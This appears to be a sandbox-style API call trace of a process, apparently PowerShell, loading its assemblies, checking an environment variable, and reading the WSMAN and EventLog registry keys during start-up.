	[0189.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25bb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0189.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25bb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.024] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.024] VirtualQuery (in: lpAddress=0x25b0c0, lpBuffer=0x25bf80, dwLength=0x30 | out: lpBuffer=0x25bf80*(BaseAddress=0x25b000, AllocationBase=0x1e0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0190.025] VirtualQuery (in: lpAddress=0x25b150, lpBuffer=0x25c010, dwLength=0x30 | out: lpBuffer=0x25c010*(BaseAddress=0x25b000, AllocationBase=0x1e0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0190.026] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.026] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.026] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.026] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.026] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.026] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.027] VirtualQuery (in: lpAddress=0x25b8d0, lpBuffer=0x25c790, dwLength=0x30 | out: lpBuffer=0x25c790*(BaseAddress=0x25b000, AllocationBase=0x1e0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0190.028] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.028] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.028] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.028] VirtualQuery (in: lpAddress=0x25b8d0, lpBuffer=0x25c790, dwLength=0x30 | out: lpBuffer=0x25c790*(BaseAddress=0x25b000, AllocationBase=0x1e0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0190.029] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.029] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.029] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0197.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x25ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0197.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x25ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0197.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x25ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0197.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x25ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0198.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0198.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0198.318] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x25ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0198.319] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x25ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0198.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0198.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0198.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x25ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0198.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x25ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0200.636] CoTaskMemAlloc (cb=0x104) returned 0x3f5ed0
	[0200.636] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f5ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0200.637] CoTaskMemFree (pv=0x3f5ed0) 
	[0200.638] CoTaskMemAlloc (cb=0x104) returned 0x3f5ed0
	[0200.638] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f5ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0200.638] CoTaskMemFree (pv=0x3f5ed0) 
	[0200.639] CoTaskMemAlloc (cb=0x104) returned 0x3f5ed0
	[0200.639] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f5ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0200.639] CoTaskMemFree (pv=0x3f5ed0) 
	[0200.641] CoTaskMemAlloc (cb=0x104) returned 0x3f5ed0
	[0200.641] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f5ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0200.641] CoTaskMemFree (pv=0x3f5ed0) 
	[0200.839] CoTaskMemAlloc (cb=0x104) returned 0x3f5ed0
	[0200.839] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f5ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0200.839] CoTaskMemFree (pv=0x3f5ed0) 
	[0200.843] CoTaskMemAlloc (cb=0x104) returned 0x3f5ed0
	[0200.843] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f5ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0200.843] CoTaskMemFree (pv=0x3f5ed0) 
	[0200.844] CoTaskMemAlloc (cb=0x104) returned 0x3f5ed0
	[0200.844] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f5ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0200.845] CoTaskMemFree (pv=0x3f5ed0) 
	[0200.859] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x25d098 | out: phkResult=0x25d098*=0x160) returned 0x0
	[0200.865] RegQueryInfoKeyW (in: hKey=0x160, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x25cf9c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x25cf98, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x25cf9c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x25cf98*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0200.865] CoTaskMemFree (pv=0x0) 
	[0200.865] CoTaskMemAlloc (cb=0x204) returned 0x4331c0
	[0200.865] RegEnumValueW (in: hKey=0x160, dwIndex=0x0, lpValueName=0x4331c0, lpcchValueName=0x25d048, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x25d048, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0200.865] CoTaskMemFree (pv=0x4331c0) 
	[0200.865] CoTaskMemAlloc (cb=0x204) returned 0x4331c0
	[0200.865] RegEnumValueW (in: hKey=0x160, dwIndex=0x1, lpValueName=0x4331c0, lpcchValueName=0x25d048, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x25d048, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0200.866] CoTaskMemFree (pv=0x4331c0) 
	[0200.866] CoTaskMemAlloc (cb=0x204) returned 0x4331c0
	[0200.866] RegEnumValueW (in: hKey=0x160, dwIndex=0x2, lpValueName=0x4331c0, lpcchValueName=0x25d048, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x25d048, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0200.866] CoTaskMemFree (pv=0x4331c0) 
	[0200.867] RegQueryValueExW (in: hKey=0x160, lpValueName="StackVersion", lpReserved=0x0, lpType=0x25d02c, lpData=0x0, lpcbData=0x25d028*=0x0 | out: lpType=0x25d02c*=0x1, lpData=0x0, lpcbData=0x25d028*=0x8) returned 0x0
	[0200.867] CoTaskMemAlloc (cb=0xc) returned 0x1b9673b0
	[0200.867] RegQueryValueExW (in: hKey=0x160, lpValueName="StackVersion", lpReserved=0x0, lpType=0x25cffc, lpData=0x1b9673b0, lpcbData=0x25cff8*=0x8 | out: lpType=0x25cffc*=0x1, lpData="2.0", lpcbData=0x25cff8*=0x8) returned 0x0
	[0200.867] CoTaskMemFree (pv=0x1b9673b0) 
	[0203.763] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x25cfe8 | out: phkResult=0x25cfe8*=0x164) returned 0x0
	[0203.763] RegQueryInfoKeyW (in: hKey=0x164, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x25ceec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x25cee8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x25ceec*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x25cee8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.763] CoTaskMemFree (pv=0x0) 
	[0203.763] CoTaskMemAlloc (cb=0x204) returned 0x4331c0
	[0203.763] RegEnumValueW (in: hKey=0x164, dwIndex=0x0, lpValueName=0x4331c0, lpcchValueName=0x25cf98, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x25cf98, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0203.763] CoTaskMemFree (pv=0x4331c0) 
	[0203.763] CoTaskMemAlloc (cb=0x204) returned 0x4331c0
	[0203.763] RegEnumValueW (in: hKey=0x164, dwIndex=0x1, lpValueName=0x4331c0, lpcchValueName=0x25cf98, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x25cf98, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0203.764] CoTaskMemFree (pv=0x4331c0) 
	[0203.764] CoTaskMemAlloc (cb=0x204) returned 0x4331c0
	[0203.764] RegEnumValueW (in: hKey=0x164, dwIndex=0x2, lpValueName=0x4331c0, lpcchValueName=0x25cf98, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x25cf98, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0203.764] CoTaskMemFree (pv=0x4331c0) 
	[0203.764] RegQueryValueExW (in: hKey=0x164, lpValueName="StackVersion", lpReserved=0x0, lpType=0x25cf7c, lpData=0x0, lpcbData=0x25cf78*=0x0 | out: lpType=0x25cf7c*=0x1, lpData=0x0, lpcbData=0x25cf78*=0x8) returned 0x0
	[0203.764] CoTaskMemAlloc (cb=0xc) returned 0x1b9670f0
	[0203.764] RegQueryValueExW (in: hKey=0x164, lpValueName="StackVersion", lpReserved=0x0, lpType=0x25cf4c, lpData=0x1b9670f0, lpcbData=0x25cf48*=0x8 | out: lpType=0x25cf4c*=0x1, lpData="2.0", lpcbData=0x25cf48*=0x8) returned 0x0
	[0203.764] CoTaskMemFree (pv=0x1b9670f0) 
	[0203.765] CoTaskMemAlloc (cb=0x104) returned 0x3f5ed0
	[0203.765] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f5ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0203.765] CoTaskMemFree (pv=0x3f5ed0) 
	[0204.285] CoTaskMemAlloc (cb=0x104) returned 0x3f5ed0
	[0204.285] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f5ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0204.285] CoTaskMemFree (pv=0x3f5ed0) 
	[0204.290] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x25d018 | out: phkResult=0x25d018*=0x2e8) returned 0x0
	[0204.296] RegQueryInfoKeyW (in: hKey=0x2e8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x25cf8c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x25cf88, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x25cf8c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x25cf88*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.296] CoTaskMemFree (pv=0x0) 
	[0204.297] CoTaskMemAlloc (cb=0x204) returned 0x4331c0
	[0204.297] RegEnumKeyExW (in: hKey=0x2e8, dwIndex=0x0, lpName=0x4331c0, lpcchName=0x25d018, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x25d018, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.298] CoTaskMemFree (pv=0x4331c0) 
	[0204.298] CoTaskMemFree (pv=0x0) 
	[0204.298] CoTaskMemAlloc (cb=0x204) returned 0x4331c0
	[0204.298] RegEnumKeyExW (in: hKey=0x2e8, dwIndex=0x1, lpName=0x4331c0, lpcchName=0x25d018, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x25d018, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.300] CoTaskMemFree (pv=0x4331c0) 
	[0204.300] CoTaskMemFree (pv=0x0) 
	[0204.300] CoTaskMemAlloc (cb=0x204) returned 0x4331c0
	[0204.300] RegEnumKeyExW (in: hKey=0x2e8, dwIndex=0x2, lpName=0x4331c0, lpcchName=0x25d018, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x25d018, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.301] CoTaskMemFree (pv=0x4331c0) 
	[0204.301] CoTaskMemFree (pv=0x0) 
	[0204.301] CoTaskMemAlloc (cb=0x204) returned 0x4331c0
	[0204.301] RegEnumKeyExW (in: hKey=0x2e8, dwIndex=0x3, lpName=0x4331c0, lpcchName=0x25d018, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x25d018, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.302] CoTaskMemFree (pv=0x4331c0) 
	[0204.302] CoTaskMemFree (pv=0x0) 
	[0204.302] CoTaskMemAlloc (cb=0x204) returned 0x4331c0
	[0204.302] RegEnumKeyExW (in: hKey=0x2e8, dwIndex=0x4, lpName=0x4331c0, lpcchName=0x25d018, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x25d018, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.304] CoTaskMemFree (pv=0x4331c0) 
	[0204.304] CoTaskMemFree (pv=0x0) 
	[0204.304] CoTaskMemAlloc (cb=0x204) returned 0x4331c0
	[0204.304] RegEnumKeyExW (in: hKey=0x2e8, dwIndex=0x5, lpName=0x4331c0, lpcchName=0x25d018, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x25d018, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.305] CoTaskMemFree (pv=0x4331c0) 
	[0204.305] CoTaskMemFree (pv=0x0) 
	[0204.305] CoTaskMemAlloc (cb=0x204) returned 0x4331c0
	[0204.305] RegEnumKeyExW (in: hKey=0x2e8, dwIndex=0x6, lpName=0x4331c0, lpcchName=0x25d018, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x25d018, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.306] CoTaskMemFree (pv=0x4331c0) 
	[0204.306] CoTaskMemFree (pv=0x0) 
